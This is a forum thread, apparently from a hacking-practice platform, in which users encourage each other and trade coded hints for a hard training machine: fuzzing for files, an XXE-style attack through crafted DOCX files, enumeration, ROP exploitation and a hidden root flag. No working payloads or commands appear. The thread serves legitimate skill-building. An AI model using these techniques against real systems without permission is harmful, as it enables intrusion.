lol when a guy ranked omniscient and ranked 53 calls this a doozy, lol what chance do i have against this box. oh well, just reading the forums prior to digging in, hopefully this will be a struggle cuddle into a better understanding of something.
Dont give up and dont fret too much about what other people do. I’ve been in the top 50 and I found this box very hard, largely because there are a lot of steps and a lot of blind attacks. But I also found Sauna hard…
lol when a guy ranked omniscient and ranked 53 calls this a doozy, lol what chance do i have against this box. oh well, just reading the forums prior to digging in, hopefully this will be a struggle cuddle into a better understanding of something.
Dont give up and dont fret too much about what other people do. I’ve been in the top 50 and I found this box very hard, largely because there are a lot of steps and a lot of blind attacks. But I also found Sauna hard…
Hard / Easy boxes are very, very subjective.
good talk coach, i’m ready to get back in there.
Being that I am the original poster of the comment you referred to originally, I agree with what @TazWake said. Hang in there
3 days later and i got user after a wicked amount of scraping the clues off the forum and a whole lot of trial and error, Thanks for the nudge of confidence guys feeling good about it. now onward and forwards.
Initial Foothold:
I don’t think anyone likes recursive fuzzing for a single file … :neutral:
Its all about the wordlist, row row row your boat, try the largest
Inspect what you find closely. Do some google kung fu
An XE* attack that works quite well. No need for automation on this. You learn more anyway if you don’t.
Sample DocX: Sample .doc and .docx download | File Examples Download
Your trying to find another file in the web client that provides you with capabilities for foothold
User:
Once on the box, use your essential automated enumeration scripts to get “user”
Root:
Go back to initial n*** scan and see what other ports are open
ROP Emporium will help if you’ve never done these types of attacks
Once you get a shell, your not done yet. You won’t find it where you are
There are files hidden that will help you with your RE
Hit me up on discord (I don’t respond to messages on the forums). Thanks!
Found the file the author mentioned, but don’t see how this helps in finding the “injection point” for X**. Tried basically all the files inside D**X and also several different things I found for O*T files. But nothing want to connect back to me.
If anyone could give me a nudge, I’d really grateful
Just to chip in regarding the final step of the box (getting the root flag) - previous hints on here were very misleading to me, as neither whale-riding is required for that, nor a “second RE/PWN”, at least as of April 2020 - maybe they were unintended ways to get the flag earlier?
Either way, the other hints and tips were solid, thanks a lot @seekorswim@TazWake and @godylocks ! =)
Anyway, to actually get the root flag, you need to double-check the place where you usually find it - maybe it is indeed there, but something covers it.
Hi, I am stuck with X**. Tried many permutations adopted from different sources. Anybody would like to guide me? If yes, I will show what I have done so far. My discord: Ric0#7152
Hi, I am stuck with X**. Tried many permutations adopted from different sources. Anybody would like to guide me? If yes, I will show what I have done so far. My discord: Ric0#7152
Thanks to @EvilT0r13 for pushing me on the right track.
Finally rooted this monster! That was the hardest box I’ve seen yet; took me about two weeks and a lot of coaching to get through this, but I learned so much! Really, it’s incredible. Almost nothing required to beat this thing was really in my book of tricks, so I had to dig around for a lot of things.
But when things finally work, the satisfaction is incredible!
Thanks for the box @gbyolo, this has been one ■■■■ of a ride!
Got root! It really hard and very interesting box. One of the best box I’ve completed. Big thanks @gbyolo!
P.S. Why does this box have such a low rating!?
